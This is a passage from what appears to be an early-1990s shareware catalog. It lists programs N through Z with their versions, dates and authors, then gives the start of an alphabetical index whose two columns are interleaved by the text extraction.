Software + METRIC-X 1.10 (01-10-92) -- Orion Development Corporation + Mille French Card Game 1.2 (11-15-91) -- Unique Software + Mom's Math 3.0 (03-03-92) -- Motes Educational Software + Money Smith 1.2 (09-15-91) -- Money Smith Systems + MORFORM 1.0 (03-01-91) -- MORSOFT + MORSOFT CALCULATOR 2.0 (07-01-89) -- MORSOFT + THE MORTGAGE MISER 1.3 (01-15-92) -- Practical Solutions + MouseTools 1.0 (09-13-89) -- Arcanum Computing + Mover 2.11 (06-09-91) -- Richard W. Adams + Movie Guide 3.0 (07-15-91) -- SANDD Software + Multi-level Pull-down Menus 2.1 (08-01-89) -- Eagle Performance + Software + Multi-level Pull-down Menus 5.5 (08-24-89) -- Eagle Performance + Software + Multi-level virtual windows 2.1 (08-01-89) -- Eagle Performance + Software + Multi-level Virtual Windows 5.5 (08-24-89) -- Eagle Performance + Software + MULTIFILE-XL 1.7 (08-22-91) -- H&P Software + Multilevel Marketing Simulator 2.00 (06-28-91) -- LRV Company + Music Manager for Windows 1.10 (03-15-92) -- Joe Herrera + MuziTrak System 1.11 (10-08-91) -- Blam Entertainment Group + My Little Realm 1.0 (04-01-92) -- My Little Realm + NAMEBASE 3.1 (03-26-92) -- Elk Creek Software + NAMEGRAM 3.0 (06-12-89) -- Neil J. Rubenking + Names & Dates 4.2 (04-26-91) -- WR Software + NED 1.6b (02-18-92) -- David L. Dight + + Appendix E, "Sorted list of all programs" 483 + + + + NEWBIZ 1.0 (03-08-92) -- Centre for Commercial Innovation (CCI) + Newkey 5.4 (06-21-91) -- FAB Software + Nifty James' RAM Disk 1.40 (01-01-91) -- Mike Blaszczak + Nifty James's File Finder 2.00 (03-04-91) -- Mike Blaszczak + Nine Men's Morris 1.03 (05-31-91) -- Langin Software + NJ's File Finder for Windows 1.00 (06-10-91) -- Mike Blaszczak + NPS - Nominal Pipe Size e1.2 (02-08-92) -- Herne Data Systems Ltd + Oak Hill Vi(tm) 5.7A (05-18-91) -- Oak Hill Software, Inc. + OffLoad 1.1 (03-01-91) -- FBN Software + OMNIDay 2.29b (12-18-91) -- Unicorn Software Limited + OMNIDiZk 2.90 (11-25-91) -- Unicorn Software Limited + OMNIMeal 3.03 (09-01-91) -- Unicorn Software Limited + On This Day 1.1 (11-26-91) -- The Software Construction Co. + Operation Process 3.0 (11-15-91) -- ALPS Software + Operation Process(PC) 3.0 (11-15-91) -- ALPS Software + Operator Process 3.0 (11-15-91) -- ALPS Software + Operator Process(PC) 3.0 (11-15-91) -- ALPS Software + ORGANIZE 2.12 (05-16-91) -- David H. Pritchett + ORGANIZE! Jazz Collection 5.27 (03-23-92) -- HomeCraft Software + ORGANIZE! Memorabilia 5.27 (03-23-92) -- HomeCraft Software + ORGANIZE! Professional Books 5.27 (03-23-92) -- HomeCraft + Software + ORGANIZE! Your Art 5.27 (03-23-92) -- HomeCraft Software + ORGANIZE! Your Books/Magazines 5.27 (03-23-92) -- HomeCraft + Software + ORGANIZE! Your CDs & Records 5.27 (03-23-92) -- HomeCraft + Software + ORGANIZE! Your Coin Collection 5.27 (03-23-92) -- HomeCraft + Software + ORGANIZE! Your Comic Books 5.27 (03-23-92) -- HomeCraft Software + ORGANIZE! Your Fabrics 5.27 (03-23-92) -- HomeCraft Software + ORGANIZE! Your Guns 5.27 (03-23-92) -- HomeCraft Software + ORGANIZE! Your Home 5.27 (03-23-92) -- HomeCraft Software + ORGANIZE! Your Model Railroad 5.27 (03-31-92) -- HomeCraft + Software + ORGANIZE! Your Plants/Garden 5.27 (03-23-92) -- HomeCraft + Software + ORGANIZE! Your Sports Cards 5.27 (03-23-92) -- HomeCraft Software + ORGANIZE! Your Stamp Collection 5.27 (03-23-92) -- HomeCraft + Software + ORGANIZE! Your Video Tapes 5.27 (03-23-92) -- HomeCraft Software + An Ounce Of Prevention 1.05 (07-01-91) -- Pete Maclean Software + OutFox 2.1 (10-19-90) -- ShareGames + Overhead Cost 3.0 (11-15-91) -- ALPS Software + Overhead Cost(PC) 3.0 (11-15-91) -- ALPS Software + Over_LAZ 2 (02-14-92) -- Herne Data Systems Ltd + Over_LAZ PS 2 (02-14-92) -- Herne Data Systems Ltd + PACE 1.0 (11-22-90) -- Mark Tigges + PACK TRACKER 1.0 (02-14-92) -- Robert Barrentine + PAGE COUNT 2.0A (11-23-91) -- Tinker Software + Painless Accounting 5.41 (06-18-91) -- Painless Accounting + Painless Acct/Payroll Companion 5.0 (06-04-91) -- Painless + Accounting + Painless Event Processor 1.01 (05-31-91) -- Painless Accounting + + Appendix E, "Sorted list of all programs" 484 + + + + Painless Menu Manager 5.0 (08-31-91) -- Painless Accounting + Painless Payroll 1.08 (05-27-91) -- Painless Accounting + Paint Shop Pro 1.0 (02-26-92) -- JASC, Inc. + PAK 2.51 (10-08-90) -- NoGate Consulting + PALERT 2.3 (06-12-91) -- Patri-Soft + Pallanda 1.6 (01-27-91) -- ShareGames + PARTY TRACKER 1.0 (02-01-92) -- Robert Barrentine + PATH-MAN 1.10 (05-24-91) -- Micrometric + PathProj 9103 (03-01-91) -- softRX shareware + PATIENCE 10 3.31 (06-11-91) -- CoCoWare - Cowles Company Software + PATTR 1.5 (12-26-90) -- Patri-Soft + PAYMENT BOOK WRITER 2.0 (04-13-91) -- H&P Software + PBfmt 1.99 (07-21-91) -- Unique Software + PBMouse 1.0 (01-01-91) -- Barry Erick + PBWindows 2.5 (09-01-91) -- Barry Erick + PC Canary 91g (05-15-91) -- Compass / New England + PC Chart (CGA/HGC) 1.4 (01-01-92) -- Guru Systems Ltd. + PC SYSTEM MANAGER 2.0 (07-01-90) -- MORSOFT + PC-AP Accounts Payable 1.6 (01-01-92) -- Medlin Accounting + Shareware + PC-AR Accounts Receivable 4.1 (01-01-92) -- Medlin Accounting + Shareware + PC-CAI 2.05 (05-24-91) -- TexaSoft + PC-CHART (EGA/VGA) 1.4 (01-01-92) -- Guru Systems Ltd. + PC-DEAL 2.45 (06-15-91) -- KINDRED SPIRITS + PC-Draft II 3.26 (01-01-91) -- Natural Software + PC-Draft-CAD 3.06 (06-01-91) -- Natural Software + PC-ECAP 2.01 (02-03-92) -- Circuit Systems + PC-FasType/CGA 4.3 (08-01-91) -- Trendtech Corporation + PC-FasType/MONO 1.3 (08-01-91) -- Trendtech Corporation + PC-FOOD 5.2 (09-08-91) -- Schreck Software + PC-GL General Ledger 3.6 (01-01-92) -- Medlin Accounting + Shareware + PC-GLOSSARY 4.1 (01-01-92) -- Disston Ridge, Inc. + PC-HAM 5.52 (03-20-91) -- Software for Amateur Radio + PC-INFO 2.17 (05-27-91) -- Cheat River Engineering + PC-Names 1.32 (02-05-91) -- WR Software + PC-PR Payroll Writing 2.1 (02-01-92) -- Medlin Accounting + Shareware + PC-STRAN(tm) 4.31 (04-01-91) -- Joe Murphy + PC-TRACK 2.14 (01-09-92) -- Thomas C. Johnson + PCBRIDGE(tm) 2.60 (01-01-90) -- Joe Murphy + PCBUDGET 2.5 (03-24-92) -- ProLogic Software + PCCLOCK 2.14 (04-30-91) -- Michael J. Sadaway + PCFDial 1.04 (01-22-92) -- Barn Owl Software + PCForm 2.3 (01-25-92) -- CareWare + PCINV Invoice Writing 1.1 (01-01-92) -- Medlin Accounting + Shareware + PCM100.COM 1.01 (08-25-91) -- Yves Charier + PCOPY 9.0D (04-01-91) -- Patri-Soft + PCStat 2.3 (08-01-91) -- PC Information Systems + PDAILY 1.0 (08-18-90) -- Patri-Soft + PDEL 4.2 (12-26-90) -- Patri-Soft + + Appendix E, "Sorted list of all programs" 485 + + + + pE - The "perfect" Editor(tm) 2.77 (08-25-91) -- Just Excellent + Software, Inc. + pEDIT PLUS 1.0 (12-15-91) -- T. G. Muench + PEG 1.03 (02-10-92) -- Cascoly Software + Peronal Record Keeper 1.1 (09-01-90) -- Professional Automated + Systems + Personal Calendar (PC) for DOS 14.41 (03-10-92) -- FunStuff + Software (Paul Munoz-Colman) + Personal Golf Tracker 2.1 (07-15-91) -- John L. Hancock + Personal Tarot 2.52 (03-01-92) -- R.K. West Consulting + Personal Time Card 1.0 (02-03-92) -- Fischer Grafix & Software + PIANOMAN 4.01 (02-08-89) -- Neil J. Rubenking + PixFolio Image Catalog System 1.03.6 (01-24-92) -- ACK Software + Plain Vanilla Labels 3.13 (12-14-91) -- Rosewood Software + Play 'n' Learn 3.00 (01-15-92) -- HomeCraft Software + Plot-Line 1.7 (01-04-91) -- PlotSoft Solutions + PlotManager 2.22 (05-13-91) -- John Intorcio + PM2LINO 1.0 (03-01-92) -- JMJ Software + PMZIP 1.00 (01-14-91) -- Nico Mak + Poetry Generator 2.1 (06-01-91) -- R.K. West Consulting + Point & Shoot Backup/Restore 2.1 (10-01-90) -- Applied Micro + Systems Technology + Point & Shoot Home Manager 2.0 (09-01-88) -- Applied Micro + Systems Technology + The Pool Manager 2.0 (08-05-90) -- American Systems + PopDBF 4.0 (08-01-91) -- Bowen Software + PostCardMaster 3.51 (10-01-91) -- Unicorn Software Limited + PowerBatch Compiler 1.4j (05-08-91) -- CSD, Inc. + PPRINT 5.3 (04-29-91) -- Patri-Soft + PREP 1.2 (08-23-91) -- Southwind Software + Prgmr's Productivity Pack Lite 1.01 (03-25-90) -- Falk Data + Systems + Print-it 1.0 (01-11-90) -- Cybernetic Software + PrintCAD 1.10 (12-16-91) -- Ravitz Software Inc. + PrintEnvelope 2.30 (03-04-92) -- Maurer Associates + PrinterBUDDY 2.01 (03-29-92) -- Lenard Dean + PrintGL 1.22 (12-16-91) -- Ravitz Software Inc. + PrintPlus 6.0 (01-01-92) -- Lambert Klein + PRO$TOCK 1.5 (05-01-91) -- Gateway Software + PRO-CR 2.02 (06-02-91) -- Gray Design Associates + Probat I (09-11-88) -- Mark Tigges + ProDev*EPRICE 4.10 (05-01-91) -- Pro Dev Software + ProDev*MEMBER 4.09h (05-01-91) -- Pro Dev Software + ProDev*QUOTE 4.10p (05-01-91) -- Pro Dev Software + ProDev*QUOTE Utility Programs 4.10p (05-01-91) -- Pro Dev + Software + Professional Master Key 3.2 (04-10-91) -- Public Brand Software + Programmer's Productivity Pack 2.61 (05-12-91) -- Falk Data + Systems + Programmer's SUPER-MAINT 2.11 (10-01-91) -- EmmaSoft + PROPLUS 1.62 (06-15-91) -- Gateway Software + PS-SLEEVE 2.0 (03-01-92) -- JMJ Software + PS-TEXT 1.0 (08-01-91) -- JMJ Software + PSEARCH 4.4e (04-10-91) -- Patri-Soft + + Appendix E, "Sorted list of all programs" 486 + + + + PTOUCH 2.0 (08-18-90) -- Patri-Soft + Public Address 2.1 (03-10-92) -- Paradise Programming + PullDown SAA Menu Shell 3.20 (07-08-91) -- MicroDynamics + Development + PURGE 2.20 (03-01-92) -- Software Designs, Inc. + PUTMAIL 1.3 (01-01-92) -- Gnosis Inc + Q&A Study Aid 3.90 (09-01-91) -- Quid Pro Quo Software + Q4Tool 1.5 (02-08-92) -- CareWare + Qanalyst 2.05 (09-19-90) -- Barn Owl Software + QEdit(R) Advanced 2.1 (04-03-90) -- SemWare + QFiler 3.2 (07-15-91) -- Jamestown Software + QFont 1.5 (10-20-90) -- Jamestown Software + QPACS 3.2 (01-01-92) -- Richard A. Williams + QQUERY (All Fox versions) 2.10E (08-01-91) -- Carlos Berguido + QQUERY (FoxBASE+ 2.10 version) 2.10E (08-01-91) -- Carlos + Berguido + QQUERY (FoxPro 1.02 version) 2.10E (08-01-91) -- Carlos Berguido + QQUERY (FoxPro 2.0 version) 2.10E (08-01-91) -- Carlos Berguido + Quilt 1.21 (03-30-92) -- Cascoly Software + QWIK Screen Utilities 5.5 (03-04-89) -- Eagle Performance + Software + QWIK Screen Utilities for C 2.1 (06-01-89) -- Eagle Performance + Software + Ravitz Editor 1.10 (08-31-91) -- Ravitz Software Inc. + RECALL 2.5 (04-11-91) -- Patri-Soft + Recap 2.3 (01-01-92) -- R.K. West Consulting + Recon(tm) 2.01 (06-18-91) -- Amdox Co. Ltd. + Recursive Realm 3.0 (09-01-91) -- Austin Software Design + Renamer 1.01 (06-09-91) -- Richard W. Adams + ReNamer 1.1 (06-30-91) -- ConVal Software, Inc. + Renamer/2 1.01 (07-07-91) -- Richard W. Adams + Resident Task Manager 2.11 (01-05-91) -- WetZoft Applications + The Retailer 4.05 (12-19-91) -- RetailWare + REXL-Lazarillo de Tormes 1.1 (12-03-91) -- REXL + Richard Webster Programs 2.1 (03-01-92) -- R.K. West Consulting + RIE - Rimrock Icon Editor 1.04 (02-20-92) -- Rimrock Software + RoDrones 1.2 (02-04-90) -- ShareGames + Room 2.11 (06-09-91) -- Richard W. Adams + Rosewood Journal 4.12 (01-27-92) -- Rosewood Software + Rubicon Publisher 2.2C (06-08-91) -- Rubicon Computer Labs Inc. + RXridge 9104 (04-01-91) -- softRX shareware + RXtraces 9103 (03-01-91) -- softRX shareware + SAFEPACK 1.1 (03-24-92) -- D J Harvey Software + Save the Planet 2.50 (01-31-92) -- Save the Planet Software + Savings Account Management Prg. 1.0 (06-22-89) -- M. P. Data + School-Mom 3.58 (12-31-91) -- Motes Educational Software + See Mail 1.3 (03-20-91) -- Gnosis Inc + SeedMaster 2.1 (11-01-90) -- White Harvest Software, Inc. + Sell More Software 3.0 (12-31-91) -- Droege Computing Services, + Inc. + Serial++ Asynch Comm Library 1.0 (02-07-91) -- Cortlandt + Technologies + Service Business Design 1.1 (03-23-92) -- Niche Software + SHERLOCK 2.60 (07-04-91) -- Gulf Sierra + + Appendix E, "Sorted list of all programs" 487 + + + + Shez 7.0 (03-30-92) -- California Software Design + SHIP TRACKER 1.0 (01-15-92) -- Robert Barrentine + Shooting Gallery 2.3 (12-16-91) -- Arcanum Computing + Show Partner Lite 3.7 (09-01-91) -- Brightbill-Roberts and + Company, Ltd. + Shredder/2 1.10 (01-23-91) -- Richard W. Adams + Simply Help! 1.0 (01-07-91) -- SimpleWare + Simply Labels IIIa (07-01-91) -- SimpleWare + SlideManager 5.13 (05-13-91) -- John Intorcio + SLIM 1.10 (02-20-91) -- Dominic Herity + Sloop Manager 1.2b (01-27-92) -- Sloop Software + Smart Home Shopper 1.2 (06-07-91) -- Torbert Data Systems, INC. + Smart10 1.2 (10-06-91) -- Sympathetic Software + SNAP! 5.0 (01-10-92) -- Walter J. Kennamer + SOFF BALLS 3.2 (11-28-91) -- Computater Software + Softball Coach 3.0 (11-26-90) -- The Software Construction Co. + SoundZ 2.20 (02-14-92) -- Unicorn Software Limited + Space Relationship 3.0 (11-15-91) -- ALPS Software + Space Relationship(PC) 3.0 (11-15-91) -- ALPS Software + Spell Games 1.1 (06-01-91) -- TexaSoft + Spider Web 1.4 (03-04-90) -- ShareGames + Spin Wall 1.6 (05-28-91) -- ShareGames + SR-Info 3.30 (09-01-91) -- Sub Rosa Publishing Inc. + SST: the Supersonic Search Tool 5.2b (05-12-91) -- Keith + Ledbetter + Stable - Technical Graphs 1.00 (09-25-91) -- WINTERRA Software + Group + STACKEY 4.0 (12-23-91) -- CTRLALT Associates + STAFF-BASE 3.0 (01-01-91) -- MSC - Morariu Software Consulting + STAFF-DBMS-PRODUCT-FAMILY XX (06-01-91) -- MSC - Morariu Software + Consulting + STAFF-DEVELOPER 1.0 (06-01-91) -- MSC - Morariu Software + Consulting + STAFF-DIAL 2.0 (01-01-91) -- MSC - Morariu Software Consulting + STAFF-GRAF 2.0 (01-01-91) -- MSC - Morariu Software Consulting + STAFF-INTEGRATOR 2.0 (01-01-91) -- MSC - Morariu Software + Consulting + STAFF-KICK 2.0 (01-01-91) -- MSC - Morariu Software Consulting + STAFF-MASK 1.2 (06-01-91) -- MSC - Morariu Software Consulting + STAFF-REPORT 2.0 (01-01-91) -- MSC - Morariu Software Consulting + STAFF-UTIL 2.0 (01-01-91) -- MSC - Morariu Software Consulting + Stamper 1.11 (01-01-92) -- Richard W. Adams + STARTREK the Computer Program 1.00 (05-25-90) -- Software for + Amateur Radio + Statistical 3.0 (11-15-91) -- ALPS Software + Statistical(PC) 3.0 (11-15-91) -- ALPS Software + $tokTraX 4.05 (02-24-92) -- Stoktrax Systems + STRG String Processing Routines 6.1b (06-17-91) -- Eagle + Performance Software + Stringer/2 1.02 (06-06-90) -- Richard W. Adams + Strudle 3.8 (06-22-90) -- ShareGames + STS26 7.0 (10-08-90) -- Robert L. Lloyd + Super StarTrek 5.5 (01-12-91) -- ShareGames + SuperFly 1.1 (10-29-90) -- Arcanum Computing + + Appendix E, "Sorted list of all programs" 488 + + + + SURVEY POWER 1.00 (01-02-92) -- WISCO Computing + Swap! 1.5 (11-26-90) -- Trinity Software + SWAPDOS 1.00 (02-01-90) -- Innovative Data Concepts, Inc. + SWAPDS 1.7x (04-15-90) -- Innovative Data Concepts, Inc. + SWAPLM 1.7x (04-15-90) -- Innovative Data Concepts, Inc. + SWAPMM 1.7x (04-15-90) -- Innovative Data Concepts, Inc. + SWAPNG 1.7x (04-15-90) -- Innovative Data Concepts, Inc. + SWAPSK 1.7x (04-15-90) -- Innovative Data Concepts, Inc. + SWAPTN 1.7x (04-15-90) -- Innovative Data Concepts, Inc. + SwimBase 1.60 (03-01-92) -- Words to Go + Systems Manager 2.5 (02-10-91) -- MiCord + T-Zero 1.03 (05-19-91) -- Dennis Cunningham + Tag! 1.51 (05-02-91) -- Trinity Software + Takin' Care of Business! AP 1.0C (03-01-91) -- Hooper + International, Inc. + Takin' Care of Business! AR 1.0C (03-01-91) -- Hooper + International, Inc. + Takin' Care of Business! GL 1.0C (03-01-91) -- Hooper + International, Inc. + Takin' Care of Business! IN 1.0C (03-01-91) -- Hooper + International, Inc. + Takin' Care of Business! M&C 1.0C (03-01-91) -- Hooper + International, Inc. + Takin' Care of Business! PR 1.0C (03-01-91) -- Hooper + International, Inc. + Takin' Care of Business! PS 1.0C (03-01-91) -- Hooper + International, Inc. + TAPCIS 5.4 (12-17-91) -- Support Group, Inc. + TAX91 1.0 (01-01-92) -- F. Roland Bjorklund + TCXL User Interface Development 5.52 (09-01-91) -- Innovative + Data Concepts, Inc. + TDisplay 1.2 (02-03-92) -- Trinity Software + TEACHER 2.0A (11-23-91) -- Tinker Software + Tear Down the Wall 1.02 (05-06-91) -- Langin Software + Technical Editor 2.61 (09-02-91) -- Superior Soft + TechnoJock's Object Toolkit 1.00 (07-01-91) -- TechnoJock + Software, Inc. + TechnoJock's Turbo Toolkit 5.02 (01-01-91) -- TechnoJock + Software, Inc. + TesSeRact Compression System 1.00 (09-01-91) -- Innovative Data + Concepts, Inc. + TesSeRact File Management 1.00 (09-01-91) -- Innovative Data + Concepts, Inc. + TesSeRact Printer Control 1.00 (09-01-91) -- Innovative Data + Concepts, Inc. + TesSeRact Screen Designer 1.00 (09-09-91) -- Innovative Data + Concepts, Inc. + TesSeRact TSR Devel. System 1.10 (09-01-89) -- Innovative Data + Concepts, Inc. + TextCon 1.73 (05-23-91) -- CrossCourt Systems + TextOut/5 2.02 (06-09-91) -- CrossCourt Systems + Textshot 2.1 (01-23-92) -- McAdams Associates + Tikler 3.95 (03-22-91) -- Olsen Outdoors + TiltMaze 1.1 (10-01-90) -- ShareGames + + Appendix E, "Sorted list of all programs" 489 + + + + Time is Money 2.2 (07-20-91) -- Custom Data Solutions + TimeStax 2.5a (02-01-91) -- Johnson Technologies + TimeTrac 91f (06-01-91) -- Compass / New England + Tolman Dental Program 3.1 (03-01-92) -- Peter T. Smith D.D.S. + Total Control 2.005 (11-15-91) -- Unique Software + Total Investor for 1-2-3 2.01A (06-01-91) -- Hughes Financial + Services + Total Investor for Symphony 2.01 (06-01-91) -- Hughes Financial + Services + TOUCH TYPE TUTOR 3.4 (05-14-91) -- Gray Design Associates + TRAINING TRACKER 1.2 (03-22-92) -- Robert Barrentine + TransferTIME (TTIME) 2.0 (09-01-91) -- RGH Software + TreeTop 2.44 (03-02-91) -- Kilgore Software + TriAxis 2.1 (01-10-91) -- ShareGames + TRIG-IT & GEO-DIM 1.01 (06-21-91) -- Northland Multisoft + TrikTrak 2.0a (03-01-92) -- Rhode Island Soft Systems, Inc. + TROOP TRACKER 2.1 (12-15-91) -- Robert Barrentine + TSR Download 2.9b (05-20-91) -- Elfring Soft Fonts + TUTOR.COM 4.5 (05-01-91) -- Computer Knowledge + UDECIDE 1.05 (04-20-91) -- Cascoly Software + Utility_Belt 1.1a (02-14-92) -- Herne Data Systems Ltd + Value Engineering 3.0 (11-15-91) -- ALPS Software + Value Engineering(PC) 3.0 (11-15-91) -- ALPS Software + VAR Grade 4.66 (12-11-91) -- VARed Software + VERSAMAP 1.16 (02-21-92) -- Charles H. Culberson + VGAWHEEL V.1.70S (01-01-92) -- WHEEL Games + VIDEO BUFF 1.33 (01-01-92) -- CACHE MICROSYSTEMS + Video Librarian 3.5s (02-10-92) -- TurboSystemsCo + VIDEOCAT 7.2 (07-28-91) -- William A. Jackson + VideoMaster 7.50 (07-04-91) -- Unicorn Software Limited + VINO:FILE Cellar Master 2.15 (10-31-90) -- Mark Christian + VMiX 386 2.67 (12-20-91) -- Commercial Software Associates + (ComSoft) + Volcano Hunter 1.0 (06-15-91) -- Informative Technologies + Volume,Hours & Productivity 3.0 (11-15-91) -- ALPS Software + Volume,Hours & Productivity(PC) 3.0 (11-15-91) -- ALPS Software + Vortex 1.2 (04-06-91) -- ShareGames + WAMPUM 4.2 (12-31-90) -- Ward Mundy Software + WEBS 1.16 (02-27-92) -- Cascoly Software + What's Up(tm) 1.31 (06-02-91) -- Nassib Nassar + WHATS-UP 1.00 (04-01-91) -- Software for Amateur Radio + WinBatch 3.0A (02-15-91) -- Wilson WindowWare, Inc. + WinCheck 3.0A (03-15-91) -- Wilson WindowWare, Inc. + The Window BOSS & Data Clerk 7.01 (03-15-92) -- Star Guidance + Consulting, Inc. + WinEdit 1.1C (07-01-91) -- Wilson WindowWare, Inc. + WinPost 3.1a (09-18-91) -- Eastern Mountain Software + WINWHEEL 1.40 (03-15-92) -- WHEEL Games + WinZip 3.00 (12-17-92) -- Nico Mak + WOPR-WinWord Office POWER Pack 1.0 (07-07-91) -- Pinecliffe + International + WordMaster 1.7 (07-11-91) -- MasterWorks + WORDSEARCH POWER 1.00 (01-02-92) -- WISCO Computing + WordZ 2.00 (07-31-91) -- Unicorn Software Limited + + Appendix E, "Sorted list of all programs" 490 + + + + Workbase 3.24 (01-01-92) -- R.K. West Consulting + WorkQueue 1.9 (12-02-91) -- Lane Davis + World Name Game 6.10 (09-18-91) -- Robert L. Lloyd + The World's Simplest Computer 1.00 (03-28-91) -- Langin Software + WORLD29 2.9D (12-11-91) -- Robert L. Lloyd + XDIR 3.05 (03-09-91) -- XD Systems + XPENS 1.1 (01-10-92) -- Richard A. Williams + XRS ("eXpress Response System") 4.50 (07-21-91) -- Smokin' + Software + YieldBook 1.2 (02-17-92) -- Compound Solutions + Your ESP Test 1.1 (01-01-92) -- R.K. West Consulting + Your Numerologist 1.03 (02-13-91) -- Unique Software + YRWAY 1.0 (01-24-92) -- Tinker Software + YRWAYx.ZIP 2.2 (03-10-92) -- Tinker Software + ZapCode Pro Printer Control 3.4 (07-01-91) -- Morton Utilities + Zephyr 2.0 (12-31-90) -- Ward Mundy Software + ZiPaper 1.3c (12-30-91) -- Daniel Thomas + ZPAY 3 3.4 (01-12-92) -- ZPAY Payroll Systems, Inc. (Paul Mayer) + ZZT Arcade-Adventure Game 3.0 (06-10-91) -- Potomac Computer + Systems + + Index 491 + + + + + + + + Index + + 80286 utilities See: AntiC 386, 406 + Utilities, Hardware APCAL 90, 434 + utilities, 286/386/486 Approved Vendor + utilities Requirements 393, 399 + 80386 utilities See: Architectural Engineering + Utilities, Hardware 234, 401 + utilities, 286/386/486 AS-EASY-AS 135, 411 + utilities ASP 106 + 80486 utilities See: ombudsman 392 + Utilities, Hardware ASP BBS Membership + utilities, 286/386/486 Application 393, 399 + utilities ASP Catalog for BBSs 393, + 3 ball Juggler 373, 430 399 + -=Tab123=- 313, 426 ASP Catalog for CompuServe + 4DOS 11, 63, 419 393, 399 + 4EDIT 100, 425 ASP Catalog for GEnie 394, + 4FILES 101, 435 399 + 4Print 52, 411 ASP List of Approved BBSs + 4Shell for Windows 53, 399 394, 399 + $tokTraX 230, 432 ASP List of Approved + 4ZIP/4UNZIP 112, 425 Vendors 395, 399 + ATC: Air Traffic + A Controller 386, 406 + AC11TO10 313, 433 Attribution 33, 400 + ACCEL 220, 429 AutoCon 70, 425 + ACCU BBS Lister 165, 407 AxTrons 363, 408 + ACCU Music Printer 346, + 407 B + ActaeOn 101, 404 Babble! 130, 411 + ActCalendar 77, 408 Backup 29, 400 + ActMenu 93, 408 Backup/2 29, 400 + Address Book Solution 142, Badge-O-Magic 53, 417 + 407 BakupWiz 30, 422 + Aerosoft Fitness Log 335, Balloons 280, 413 + 429 Bannerific 352, 406 + AFFORD IT??? 231, 412 Bass Class 375, 417 + ALBUM KEEPER II 318, 407 BassTour 375, 417 + AlbumMaster 319, 421 BatchMaker Plus 7, 418 + ALITE 135, 411 BATUTIL 64, 422 + ALLY 314, 425 BBSs 393 + ALPHAQUOTE 310, 420 BCS Menu Program 93, 424 + ALPS 233, 401 BESTTEST 295, 422 + ALPS(PC) 233, 401 Better Diet Analyzer 333, + AM-EDIT 116, 430 429 + AMORTIZATION TABLE 231, BlackJack! 372, 408 + 418 BLANK-IT 42, 420 + AMORTZ 218, 403 Bmenu 94, 423 + Ample Notice 77, 409 Book Librarian 319, 424 + + Index 492 + + + + Book of Changes 348, 425 Chris's Automobile + BOOKLET 54, 403 Recorder 351, 404 + BOOKLET-SCREEN 54, 403 CHRONOS 299, 406 + BOOT.SYS 70, 421 Church Membership Tracking + BootMaster 70, 434 Sys 356, 424 + Border 386, 406 Cipher 380, 401 + BOXER(tm) Text Editing Cipher-Ace Series 385, 433 + System 116, 400 Cipher for Windows 381, + BRAINdead2 372, 428 401 + Brandon's Bigbox 280, 420 Circle Link 387, 408 + BridgePal 368, 419 Citizen 49, 425 + Brother's Keeper 344, 423 CleanUp 363, 408 + Browse/2 39, 426 ClipMate for Windows 86, + Btr Help! 275, 422 432 + Btr Watch 155, 422 CLOCK 81, 434 + Business Plan Master (IBM) CM_FILER 102, 427 + 198, 434 CNC-Transedit 252, 418 + Business Plan Master (Mac) CODE TO CODE 124, 420 + 198, 434 Collect! (VGA version) + By the Numbers 348, 425 321, 432 + COM-AND 161, 414 + C Command Post 104, 426 + C.A.R.S. 173, 412 Complement & Schedules + CADET 314, 425 234, 401 + CALC_JNC 76, 434 Complement & Schedules(PC) + Calculation Solitaire 370, 235, 401 + 424 CompUser 396, 421 + Calendar Keeper 78, 412 CompuServe 392 + Calendar Mate 78, 409 Computer Trivia Quiz 289, + CALendar preview for 429 + SideKick 2 110, 425 ConvDW 128, 426 + CALendar RePorT for Convert To Structured + SideKick+ 111, 425 BASIC 276, 420 + CALendar report for TRaVel Creativity Package 131, + 111, 425 425 + Calendar Wise 78, 435 CROSSDOWN 381, 432 + Canfield For Windows 370, Crossword Clipper for + 424 Windows 125, 411 + Capbuf 73, 406 Crossword Creator 125, + Capital Gainz 230, 404 382, 411 + Cash Control 221, 417 CROSSWORD POWER 382, 385, + CassetteMaster 319, 421 431 + CATALOG-ON-A-DISK 208, 400 Crystal Ball 349, 425 + CatScan 170, 423 CtrlcLib 263, 413 + CDMaster 320, 421 Cumberland Diary 345, 434 + Changer/2 276, 400 Cumberland Story 345, 434 + Charge Account Management Cumberland Tree 345, 434 + Prog. 232, 418 Curses! 361, 425 + Checkbook Management Custodial Requirements + Program 228, 418 235, 401 + Cheque-It-Out 221, 409 Custodial Requirements(PC) + Children's Graphics 236, 401 + Program 305, 416 Custom#Menu 315, 426 + + Index 493 + + + + D DICOGO 250, 426 + Dad's Choice 300, 416 DIMANAGE 204, 426 + DaMenu 13, 435 Dinger 132, 413 + DARN! Don't Forget! 87, DirBack 30, 408 + 400 DIRECT MAINT 14, 416 + DasBOOT! 71, 417 Director 14, 400 + DayMaster 79, 421 Directory Freedom 7, 408 + DAYO ACCOUNTS PAYABLE (AP) Directory-Manifest 8, 418 + 173, 410 DIREDIT 102, 407 + DAYO ACCOUNTS RECEIVABLE DiscTrak System 329, 427 + (AR) 186, 410 Disk DUP 24, 400 + DAYO BACK ORDERS (BO) 182, Disk Manager (CUDM) 10, + 410 400 + DAYO BAR CODE 3 OF 9 192, Disk OrGanizer (DOG) 15, + 410 416 + DAYO BILLING & INVOICING DISK SPOOL II 43, 421 + 186, 410 DISKLIST 24, 402 + DAYO END OF PERIOD 192, DiZk4D 11, 421 + 410 DiZkND 11, 421 + DAYO GENERAL LEDGER (GL) DJ-CHECK 50, 435 + 172, 410 DJ-LOPE 51, 435 + DAYO INDEX 212, 410 DJ-SLEEVE 51, 435 + DAYO INVENTORY 193, 410 dLITE 141, 417 + DAYO LITTLE POS 183, 410 DMP 46, 414 + DAYO LOOKUP 214, 410 DMPLAS (Dot Matrix to + DAYO MEMBERSHIP 200, 410 LaserJet) 55, 417 + DAYO MENU 94, 410 DOS Extensions for + DAYO MRP 194, 410 Professional 15, 428 + DAYO ORDER ENTRY 183, 410 DOS Summary 290, 422 + DAYO PASSWORDS 213, 410 DOS Summary (Hypertext) + DAYO PAYROLL 190, 410 290, 422 + DAYO POS (POINT OF SALE) DosEA 3--10 Easy Commands + 183, 410 291, 412 + DAYO PRICE BOOK 209, 410 DosEA 5--All About MS-DOS + DAYO QUOTES 184, 410 5.0 292, 412 + DAYO RENTAL POS 184, 410 DosEA 4--Find That + DAYO RETURN MANAGEMENT Command! 292, 412 + SYSTEM 194, 410 DosEA 1--For Absolute + DAYO RETURNS & REFUNDS Beginners 291, 412 + 185, 410 DosEA 6--Switched on DOS + DAYO SIMPLE POS 185, 410 293, 412 + DAYO SMART REPORTS 214, DosEA 2--What is DOS? 291, + 410 412 